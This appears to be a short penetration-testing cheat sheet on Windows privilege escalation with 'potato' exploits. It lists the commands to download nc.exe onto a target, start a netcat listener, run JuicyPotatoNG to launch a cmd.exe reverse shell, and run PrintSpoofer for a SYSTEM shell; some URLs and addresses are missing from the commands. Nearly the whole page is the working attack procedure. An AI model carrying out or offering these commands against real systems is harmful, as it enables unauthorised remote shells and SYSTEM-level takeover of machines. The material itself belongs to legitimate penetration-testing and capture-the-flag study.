Windows PrivEsc with Potatoes

Last modified: 2023-04-08

Privilege Escalation Windows


We can use a payload from here.
Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Invoke-WebRequest -Uri -OutFile c:\Temp\nc.exe

Next start a listener in local machine.

nc -lvnp 4444

Then execute JuicyPotato in target machine.

JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a " 4444 -e cmd.exe"


this repo is available for compiled executable.

PrintSpoofer.exe -i -c cmd